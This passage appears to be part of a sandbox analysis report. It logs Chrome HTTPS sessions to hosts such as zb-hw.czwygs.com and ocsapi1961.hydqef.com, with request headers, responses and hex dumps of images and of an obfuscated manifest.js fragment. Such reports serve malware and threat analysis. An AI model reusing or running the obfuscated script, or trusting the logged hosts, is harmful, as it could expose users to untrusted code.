                                                                                                                                                          Data Ascii: r:/][Z9Xs{E)~Wpj&BY?w x7oTW0P >HO5FM4E2bxmjU.`UfYoZ?y/\kycw1b_r95;!^,>L!|,[(+[d70+X
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: f1 ee e4 9a ac 57 82 65 84 ed 3c 0c 20 0e f2 45 7e d1 7a d8 d2 50 93 44 11 c4 3a 33 9a d5 a5 52 71 d7 5c f9 dd 39 9f 2b 31 76 a6 09 e5 f4 94 dd 7e dd 90 09 4c 77 30 10 92 2c b8 70 df b0 65 64 64 6c cc 9e 0a 8d 06 5e cd 15 e2 a6 e9 a1 69 d2 84 6e ca b2 9b bb 1a 06 8a df 80 42 12 45 a9 14 9b 1f b7 8c 5b 82 68 d1 5e 64 67 96 a1 50 4f 65 88 44 7a 2f 10 08 f7 4e 39 6c 12 08 70 90 93 c1 d7 b2 0c 1e 07 76 3d 85 94 b6 a3 ae da 5e 9d 79 66 7e 27 b7 2e b3 e6 13 c9 a5 f7 40 63 e5 18 19 ed d2 e7 db d6 a6 64 83 51 30 51 a0 a8 40 cb 29 6c 8f 97 7f 99 74 95 5d 73 73 93 93 63 86 a7 d7 28 89 55 2b 7b 7a 07 d3 86 eb 71 04 6c 06 41 2e a7 17 34 05 c3 86 d1 d1 b8 65 dc 97 0a 8c a6 a3 b8 d1 5c 37 44 20 20 8a a9 f1 5c 2e d6 37 f0 ba 84 82 42 45 2e 57 02 09 cb 98 ab 8f 43 b4 b8
                                                                                                                                                          Data Ascii: We< E~zPD:3Rq\9+1v~Lw0,peddl^inBE[h^dgPOeDz/N9lpv=^yf~'.@cdQ0Q@)lt]ssc(U+{zqlA.4e\7D \.7BE.WC
                                                                                                                                                          2024-06-09 22:41:11 UTC315INData Raw: 76 9f db 3d 27 db 87 a4 27 08 35 e9 2e d2 1d ec df 5d 49 d8 83 0b 19 db fc 75 ac 17 ba 3b fb 6c 43 d3 9e 72 cf fc 7e 4c 31 77 ae 41 71 c4 81 a1 a1 8b 8b 44 bb cf 89 a7 ef 7d e3 8e 5f fa 8a c1 0d 00 99 e2 d2 4c c3 ee f1 9a 7a 47 b0 a3 a9 63 9f 70 8a 90 4f 9a fa 88 af db 93 e5 50 da 5a c9 cf 7a 69 1c e8 54 94 4c ca bb dd 0a d4 69 e9 68 bb bf a9 2f 1d 9c 60 26 86 b6 72 74 d2 1b de 87 26 7d ce fd 95 01 0f 18 68 27 da 3d 16 09 7d 87 b4 53 c3 a5 2e 88 21 87 ce e5 3a ce c7 2e 84 41 97 47 3a f8 45 92 a0 0f 87 27 23 68 5c a4 e1 87 bb ee 2b 57 68 69 c9 44 0a 1a d7 ff c8 b5 5e b5 3b f3 23 a2 85 75 1e e7 6f aa 1a 93 d4 99 d2 a5 90 09 5a ea 08 d7 38 cf 3f 2f 7d 88 81 7c 7d 2a 21 fb 80 46 e2 7d de 66 52 dd 15 02 c3 02 85 69 a4 17 a7 49 5d 01 1a 79 ac e6 28 2b 3e b2 0f
                                                                                                                                                          Data Ascii: v=''5.]Iu;lCr~L1wAqD}_LzGcpOPZziTLih/`&rt&}h'=}S.!:.AG:E'#h\+WhiD^;#uoZ8?/}|}*!F}fRiI]y(+>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          349192.168.2.55011190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /pc/image-pc/index/312/app/04.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 114423
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:26 GMT
                                                                                                                                                          ETag: "5d71fe6a-1bef7"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE6[17],EU-GER-frankfurt-GLOBAL1-CACHE14[0,TCP_HIT,16],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9864da7f0d289b82bc1a73d26cc4b977
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 45 00 00 02 2c 08 06 00 00 00 65 67 bb 52 00 00 20 00 49 44 41 54 78 5e ec bd 07 94 1c d7 79 26 fa 55 ea 38 79 30 11 61 90 23 01 10 04 41 42 60 30 83 28 d1 ca 5e 91 a2 b4 b6 64 d8 5a af 77 25 4b 5e 59 6b c1 7b d6 e7 59 cf e9 ac b5 3e ef ad f5 bc b2 bd b2 6c 89 b2 4c ca b2 44 da 92 48 4b 8c 20 01 02 22 41 12 39 e7 30 39 77 ae f8 ce ff df aa ee ea 9a 0e d3 18 0c 09 42 73 49 9c 99 9e ae ba 75 eb de ff 7e f7 cf bf 84 b9 36 ad 19 70 1c 27 94 4a a5 5a 34 4d 6b 05 b0 12 c0 26 00 ab 4c d3 5c 64 9a 66 3b 80 06 00 31 49 52 54 c7 71 9c 72 9d da 90 8b be 92 25 a9 e8 b3 5d fc b1 ea d8 64 d8 55 af a9 78 81 53 3c 9e 99 75 76 15 77 4b 33 1b bf 6d 97 9d ea ab 18 cc dc 2d 55 67 c0 71 32 00 c6 1d 49 4a 01 ce 98 22 cb
                                                                                                                                                          Data Ascii: PNGIHDRE,egR IDATx^y&U8y0a#AB`0(^dZw%K^Yk{Y>lLDHK "A909wBsIu~6p'JZ4Mk&L\df;1IRTqr%]dUxS<uvwK3m-Ugq2IJ"
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 58 14 54 25 0d 21 ea c7 32 59 ff 67 4a e4 54 40 ee 0f 11 a8 8e 8d 90 99 43 58 71 90 ce ea 90 d4 08 1c 39 c6 4e fd 96 6c 40 cf 65 a0 a8 61 d7 45 46 a4 62 72 14 87 23 01 f4 9c 03 a8 21 28 9c 6d 44 d4 d0 15 1c a3 48 02 91 6f a5 fc e2 ca 65 79 71 eb 4c 57 d3 8b 55 5a 82 99 8a cf 22 81 41 e9 27 f0 7b 29 bc 3a 22 b6 97 22 84 38 7c cf 60 77 1c e2 92 46 53 36 ea a3 1a 9a 94 09 66 59 86 75 8a c4 90 d1 08 07 b1 ba 06 f4 26 0d 64 0d 13 52 2c cc 2a 89 46 18 e8 69 af 47 26 95 c1 58 32 89 a4 a4 22 49 62 b3 4a bb 59 c8 cb aa 23 0b 50 24 5c 61 41 a0 8c cb 92 5b 60 7e 26 24 2a 12 84 d4 d0 02 87 1e 83 a2 af 6c 01 31 8e a6 25 52 88 51 71 36 3b ab 43 8b 84 f9 00 a6 da de 6a 48 84 96 9a 94 8d 89 84 91 89 71 84 e2 71 c8 7c 81 0d db b4 38 3f 80 a5 a8 30 6c 1d b0 74 8e 6e b1 9d
                                                                                                                                                          Data Ascii: XT%!2YgJT@CXq9Nl@eaEFbr#!(mDHoeyqLWUZ"A'{):""8|`wFS6fYu&dR,*FiG&X2"IbJY#P$\aA[`~&$*l1%RQq6;CjHqq|8?0ltn
                                                                                                                                                          2024-06-09 22:41:10 UTC16384INData Raw: 05 43 8a ec 27 53 54 a0 70 ee 51 3f 5e a3 82 ba d5 38 d9 4f 87 d8 c7 ce 7e 8a a4 5c 50 94 be 8c 65 82 c4 ed cf 9c 0b f0 ec 71 7f f6 53 2a bc 9e ed cd 17 7e 92 0f fc d5 49 17 75 42 64 ae 53 2d 95 00 c5 5c 69 8d fd 6c 0f d2 a6 7a 9b fb 9e dc 7b d4 df f6 23 9a f9 80 d5 3e 07 4a 59 a3 f3 83 62 4a d6 55 2e 28 8a b0 c8 39 6f 96 2a 28 96 d2 e1 c5 5c 5b 2a 28 aa 1c 2d 94 16 59 84 98 c1 b0 8e 87 c9 27 16 11 44 8e 82 2a 93 2b 4d 60 98 a1 f7 b2 73 1c aa fa 3a 6c ab 5d f1 22 72 12 d8 a3 6a 28 0f d2 6e 27 92 a3 1c c9 52 93 24 95 ae 81 09 8f 99 7a 72 82 29 62 09 57 19 94 0e ca fb 4c 75 8a 52 9f 3a d6 65 27 bb 98 ab cf 73 99 c1 ed 52 a4 d4 73 0e 66 b5 5c d0 50 8b 58 a5 6f 28 66 8c f3 5d 53 28 7d 43 a1 ef 67 49 47 65 e4 ec b1 9f 31 ae 04 08 96 db 17 c5 de a7 e8 ba cc f1
                                                                                                                                                          Data Ascii: C'STpQ?^8O~\PeqS*~IuBdS-\ilz{#>JYbJU.(9o*(\[*(-Y'D*+M`s:l]"rj(n'R$zr)bWLuR:e'sRsf\PXo(f]S(}CgIGe1
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 8a 9b cd 90 ff 7d 6d 33 e0 88 8b 8b 33 4b 58 ed ea c1 77 af a5 f0 e2 ec 22 b2 c1 20 c2 1d 7d 48 e5 98 fa 6a 14 c3 79 57 53 49 b1 35 92 3b 65 20 b7 84 af 8f c5 f1 89 81 08 f6 c7 23 a7 22 c0 69 d8 10 50 24 82 da a6 89 1c 2a 41 d1 44 2e 93 c1 f1 9b 76 7b 4d 93 b5 0d b5 c6 56 6d eb b8 c6 eb b7 ac d9 76 06 45 de 24 41 88 ff 29 21 12 00 29 dd b1 0c 01 41 91 ce 95 f9 f9 79 91 f0 98 e2 c7 f8 c4 37 de 78 03 7f f3 37 7f 23 d2 e1 f7 bf ff 7d 9c 3c 79 52 7e bf 7c f9 b2 64 b9 dc 75 d7 5d e2 bd a6 b7 9a 59 04 cc 84 21 f8 32 e8 fb be 4f dc b7 21 79 ac 1f 92 d3 b2 6d e7 77 e4 ce c0 e2 ec 1c 56 bb 06 f0 fd e9 3c 7e 7f 6d 06 46 3c 82 de fe 7e e4 12 05 84 43 01 a9 da 31 3e b3 82 4c 2e 0b 23 12 42 2a 93 c1 0e 2d 83 47 86 23 f8 cc de 21 8c 02 6b 40 51 e2 14 6d aa e1 de 38 45
                                                                                                                                                          Data Ascii: }m33KXw" }HjyWSI5;e #"iP$*AD.v{MVmvE$A)!)Ay7x7#}<yR~|du]Y!2O!ymwV<~mF<~C1>L.#B*-G#!k@Qm8E
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: e1 c3 43 b8 77 a0 0b 9d c0 a9 80 85 d3 9a 8e 23 b0 6c bd a0 51 52 f4 41 b1 19 4c 6c 89 4d 91 b9 96 94 86 78 d0 46 48 50 62 58 0c 0f aa b6 04 3a 3e 44 04 49 b6 53 aa 23 41 86 80 e8 3d f8 60 56 82 06 cf e7 a1 24 38 7e af c2 6c bc e7 56 72 29 f2 6f aa ae 6c 1f 0e 85 c5 8e 47 29 52 79 c4 15 b0 b3 0d c7 c4 b1 6e a4 d6 7a 41 91 aa 16 39 14 59 f4 a8 60 e6 c4 f4 4e 96 6a 1e 85 42 5e 72 6d 09 1a 12 af e8 d2 74 a9 b1 b6 8b ef b1 6c 22 bd a1 38 ae b4 4a a0 52 cc 3e 42 03 26 21 35 ae 64 45 22 81 82 25 38 19 08 87 dc 79 20 eb 60 a1 e8 59 76 18 58 e5 0e 49 74 e9 02 2a 4d 0d 95 71 7c 15 c4 b4 37 20 b3 45 f6 10 41 9c 65 75 65 ac 5c 21 27 cc 86 51 0f dc 1b 01 65 fc b4 0b c2 fd 49 3e 4c 16 a5 72 c2 8b c8 df a9 bc cf 8e e4 a9 bc d0 ad 7b a9 d9 98 5c 9c 85 c6 a4 86 50 04 97
                                                                                                                                                          Data Ascii: Cw#lQRALlMxFHPbX:>DIS#A=`V$8~lVr)olG)RynzA9Y`NjB^rmtl"8JR>B&!5dE"%8y `YvXIt*Mq|7 EAeue\!'QeI>Lr{\P
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 25 0a 24 9d 39 47 8f 1e cb f1 28 92 a5 65 67 6f af b0 72 ff e4 27 3f 46 28 12 c1 f4 cc 34 b2 99 2c 7a b6 f5 a0 b1 a1 11 b7 de 76 2b 7c 24 af 58 e6 e0 02 3e 36 36 66 69 8a a2 28 31 47 2f 8e d9 c9 f3 98 9d 39 8d 86 a8 17 a9 99 34 a2 b5 5b 10 da 74 13 a0 d6 48 7d 19 6a af cf 3f f7 9c bc 30 24 4a 20 a3 f6 89 e3 27 a4 1f ff f4 4f ff 24 8c e1 cc a9 3d 7e ec 18 de 78 f3 4d 61 ca 21 0f 24 f3 67 7d 7e bf 65 a7 cc 37 2d ac d1 1c 50 5c 68 2c 0d 8b 91 7b 0e 9f 22 d2 33 98 1d be 28 fc 1e b1 ac 8e d6 9e 1d 48 27 bd 38 7a e2 1c c2 b5 8d a2 99 fc fc 85 9f e3 7f fd 93 03 e8 6c e9 10 92 59 82 06 83 f5 09 7e f5 f5 f5 78 f6 b9 67 f1 e0 fe 07 65 6b 4d 2d 9d 84 10 d4 8c 2b ce 92 e3 74 d0 71 48 88 b5 8e 25 07 d2 98 9f 1a 43 32 1d 13 4d 8c 5a 5e b4 36 02 23 1b 97 79 d2 0c 15 81
                                                                                                                                                          Data Ascii: %$9G(egor'?F(4,zv+|$X>66fi(1G/94[tH}j?0$J 'O$=~xMa!$g}~e7-P\h,{"3(H'8zlY~xgekM-+tqH%C2MZ^6#y
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: bd 06 b7 d1 4b d9 e2 58 94 ae 8e 5c c8 ab ec 11 99 49 7d df 7a 37 eb 90 06 11 03 0e a0 e8 77 a6 68 d6 1f 2d 2b 0f f1 76 0d f7 2b aa 2f 85 9d ae 57 50 ba 29 e9 14 ec ee 4b ab ef 8a 1b 70 87 32 e1 40 9b d0 16 3a a0 c8 34 05 9c a3 dd f6 7c 8a 63 f3 b9 fc 5d dd 0a a5 98 5b 1a 2f df 61 24 69 fe ab 69 e8 8d 97 30 96 40 6f 79 00 dc b0 9c 2d 84 a2 82 6f 27 29 bf 6e 77 b8 48 29 f5 f3 40 aa 72 53 b8 6c a6 7a ec 47 d9 b1 2d 89 7c 99 0a c2 35 41 fb 39 46 f9 a7 a3 ff 2d dd 7a 73 f7 de 04 85 a8 87 2f 0d c5 b5 c6 aa b9 f9 fa 71 47 4b cf bb ba d5 50 cc 1a af 85 62 f6 a0 2a 0c 9d e9 05 64 4a 01 17 92 ee d5 6c 21 14 dd d3 ba d3 0b e4 99 a8 ba 6c 33 21 d2 f3 a6 e6 6c a0 f5 ac a6 33 e5 f3 55 af aa ac 3c 53 75 2b 94 97 02 05 d3 59 cb eb 0e 37 d4 f5 aa 60 b9 17 c0 71 3b 87 24
                                                                                                                                                          Data Ascii: KX\I}z7wh-+v+/WP)Kp2@:4|c][/a$ii0@oy-o')nwH)@rSlzG-|5A9F-zs/qGKPb*dJl!l3!l3U<Su+Y7`q;$
                                                                                                                                                          2024-06-09 22:41:11 UTC363INData Raw: 79 cb 5c 6b 99 63 f4 b3 cd 56 03 2c 4f 05 f5 53 de 6e db f6 ba 96 b2 fe 44 ff 1c bd 8e 5b 76 fb 32 4a b4 5f 68 f7 03 ec 9e f5 3c ea c6 dc f3 84 9b b8 41 af 6b e9 b5 be 5b d1 36 0b 64 bd 80 db 4f 75 f5 73 7d fd 6c bb d5 90 ea b7 6c fd d4 d1 30 30 19 d5 79 38 ce a8 00 93 57 a6 7e 8f 3d cc 31 b6 0a b0 fd bc 44 86 be fe ed 6a 80 a3 6c 60 83 c2 cc dd 6f 33 ea a1 9f 63 96 d9 b6 cc 36 a3 a8 8b ad ba 37 45 e7 19 f6 3a 07 2d ff d0 0f d3 a0 27 ee 73 bf 61 cb 59 66 ff 32 db f4 ab e6 fa b9 cc b2 e7 2f bb 5d 3f e7 7e 41 f4 3e f7 75 41 25 37 1e e6 c1 1b 66 df 92 c5 eb d8 6c 54 e7 1b e6 38 c3 ec 3b c8 35 bf d8 f7 19 e6 61 1e 66 df 7e 14 d7 a8 ef c1 30 e5 1e 66 df be af 63 dc d8 8b ab 6c d4 75 33 ea e3 f5 7d b3 fb dc e1 85 56 de 3e 2f 6f c7 6c be a5 0f fc 08 ae 7a d4 e5
                                                                                                                                                          Data Ascii: y\kcV,OSnD[v2J_h<Ak[6dOus}ll00y8W~=1Djl`o3c67E:-'saYf2/]?~A>uA%7flT8;5af~0fclu3}V>/olz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          350192.168.2.550114163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC369OUTGET /ocs/cc.png?1717972860984 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC418INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 332
                                                                                                                                                          Connection: close
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache7.l2hk3[6,0], cache23.l2sg3[39,0], ens-cache8.de5[204,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9c17179728706521537e
                                                                                                                                                          2024-06-09 22:41:10 UTC332INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff c0 00 0b 08 00 01 00 01 01 01 11 00 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93
                                                                                                                                                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          351192.168.2.55011690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC542OUTGET /pc/240516-03/static/js/manifest.js HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                          Referer: https://js326.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC643INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                          Content-Length: 18632
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 16 May 2024 08:59:00 GMT
                                                                                                                                                          ETag: "6645cad4-48c8"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE3[561],EU-GER-frankfurt-GLOBAL1-CACHE9[552,TCP_MISS,556],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 3d5b8ca487d4fe2ea15f7f6f5db67c1a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 1993405
                                                                                                                                                          X-CCDN-Expires: 598608
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15741INData Raw: 61 34 76 6a 65 75 75 65 28 22 49 51 4d 77 72 67 64 67 78 67 4c 67 6c 67 65 77 67 43 67 51 53 67 4e 34 44 63 43 47 41 6e 41 41 67 47 63 42 65 41 64 7a 67 67 42 4d 45 79 41 36 4d 67 55 77 43 4d 41 48 48 4b 41 61 77 43 6b 69 6c 57 41 33 42 57 71 30 47 4c 64 6c 31 37 38 53 34 61 50 43 54 49 59 41 47 67 43 32 53 67 46 61 59 51 43 50 4d 6c 79 46 57 53 75 45 72 78 4b 6f 4a 41 41 78 4b 41 4e 69 51 44 61 41 58 51 46 51 41 50 44 44 72 58 47 45 41 4f 59 77 41 46 73 34 41 31 49 46 6f 63 43 51 77 64 6c 41 4f 53 6f 78 32 63 41 34 41 5a 41 6e 57 64 4b 78 67 52 48 37 49 73 66 46 32 46 67 35 6f 4d 58 45 4f 6c 67 4c 61 75 71 77 45 6c 41 51 71 61 41 44 79 7a 4f 71 4d 73 4b 6c 34 43 44 42 74 41 4a 36 73 6a 48 52 2b 4f 45 53 31 5a 42 41 41 43 71 33 64 65 44 41 64 64 46 41 34
                                                                                                                                                          Data Ascii: a4vjeuue("IQMwrgdgxgLglgewgCgQSgN4DcCGAnAAgGcBeAdzggBMEyA6MgUwCMAHHKAawCkilWA3BWq0GLdl178S4aPCTIYAGgC2SgFaYQCPMlyFWSuErxKoJAAxKANiQDaAXQFQAPDDrXGEAOYwAFs4A1IFocCQwdlAOSox2cA4AZAnWdKxgRH7IsfF2Fg5oMXEOlgLauqwElAQqaADyzOqMsKl4CDBtAJ6sjHR+OES1ZBAACq3deDAddFA4
                                                                                                                                                          2024-06-09 22:41:10 UTC2891INData Raw: 75 49 73 2b 61 76 79 6f 73 58 32 62 79 76 43 39 4b 68 65 44 58 55 46 56 4c 7a 63 39 6d 2f 51 70 4d 76 62 58 69 31 35 75 4c 6c 64 78 65 78 37 70 33 6d 62 79 35 2b 6a 46 59 70 69 76 7a 72 72 46 42 5a 2f 64 65 42 6c 41 76 41 43 51 6c 50 36 2b 49 2f 58 66 2f 6b 49 62 78 62 30 47 39 39 4b 63 66 79 76 46 61 66 56 49 65 4a 65 2b 56 6a 47 55 69 6e 6a 37 78 57 6c 54 4b 48 69 37 76 6d 5a 41 2b 32 31 35 56 4c 73 6f 7a 76 57 6e 68 48 49 6a 36 75 2f 30 34 50 55 6e 6d 59 72 2f 71 55 52 38 57 65 63 63 50 4b 48 4c 33 46 2f 4e 4c 34 2b 43 76 63 44 34 6e 31 6a 35 4e 53 38 70 63 66 71 5a 42 4d 6c 31 2f 4f 4d 68 6b 45 79 6f 58 74 6e 44 65 4b 63 2f 37 65 58 50 50 70 5a 6e 32 65 34 6f 51 65 70 6b 79 58 58 34 4d 72 4b 6e 73 2b 35 66 47 48 2f 50 30 7a 39 65 4b 5a 53 72 75 41 66
                                                                                                                                                          Data Ascii: uIs+avyosX2byvC9KheDXUFVLzc9m/QpMvbXi15uLldxex7p3mby5+jFYpivzrrFBZ/deBlAvACQlP6+I/Xf/kIbxb0G99KcfyvFafVIeJe+VjGUinj7xWlTKHi7vmZA+215VLsozvWnhHIj6u/04PUnmYr/qUR8WeccPKHL3F/NL4+CvcD4n1j5NS8pcfqZBMl1/OMhkEyoXtnDeKc/7eXPPpZn2e4oQepkyXX4MrKns+5fGH/P0z9eKZSruAf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          352192.168.2.55010990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC615OUTGET /pc/image-pc/index/312/parner/argentina_logo.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 7800
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:55 GMT
                                                                                                                                                          ETag: "5d71fe87-1e78"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE2[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE10[3],EU-FRA-paris-GLOBAL1-CACHE11[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465111
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9a1f229774a3ee763fc8b30ce606e0ca
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126889
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
